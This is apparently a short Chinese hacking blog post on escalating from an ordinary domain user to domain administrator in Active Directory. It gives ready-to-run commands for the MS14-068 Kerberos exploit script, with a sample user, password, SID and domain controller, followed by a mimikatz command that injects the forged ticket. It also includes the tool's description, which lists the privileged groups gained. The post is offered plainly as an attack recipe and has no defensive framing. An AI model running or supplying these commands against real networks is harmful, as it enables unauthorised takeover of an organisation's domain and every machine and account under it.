提权:
会提权的兄弟应该都知道 域的权限是整个局域网最高统治权 当我们拿下一台服务器 只是域下的一台机器 这时候 就会想尽办法 拿下域控制服务器
不知道的可看本博客之前做的教程
可以让任何域内用户提升为域管理员
使用命令:
c:\python27\python.exe ms14-068.py -u k8test3@k8.local -p k8team!@# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.local
mimikatz.exe “kerberos::ptc TGT_k8test3@k8.local.ccache” exit
ms14-068.py
Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :
Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator